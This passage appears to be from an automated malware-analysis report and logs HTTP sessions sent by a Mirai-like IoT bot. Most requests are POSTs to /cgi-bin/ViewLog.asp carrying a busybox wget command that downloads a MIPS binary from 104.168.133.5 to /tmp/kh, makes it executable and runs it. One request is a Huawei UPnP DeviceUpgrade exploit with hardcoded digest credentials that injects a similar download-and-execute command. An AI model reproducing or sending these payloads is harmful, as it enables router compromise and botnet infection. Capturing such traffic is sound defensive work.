                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:15.302351952 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:24.518348932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.462285042 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.326203108 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              386192.168.2.133330295.86.112.1458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:06.777261019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              387192.168.2.133394694.183.212.2498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:06.863940001 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:07.193015099 CET1340INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Server: Microsoft-IIS/10.0
                                              X-Powered-By: ASP.NET
                                              Date: Thu, 23 Nov 2023 03:17:00 GMT
                                              Content-Length: 1245
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking fo


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              388192.168.2.133538894.130.90.858080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:09.801659107 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:09.996726036 CET142INHTTP/1.0 400 Bad Request
                                              Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                              Data Ascii: Client sent an HTTP request to an HTTPS server.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              389192.168.2.134180694.122.233.2348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:10.211971998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              390192.168.2.1358864156.241.15.15537215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:10.661124945 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              391192.168.2.134882831.136.82.468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:10.813724995 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:14.022341967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.166465044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:32.198319912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.798208952 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              392192.168.2.135701231.7.46.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:10.839840889 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:11.053648949 CET560INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Content-Length: 341
                                              Connection: close
                                              Date: Thu, 23 Nov 2023 04:17:09 GMT
                                              Server: lighttpd/1.4.59
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              393192.168.2.134389294.121.177.2548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:10.860079050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
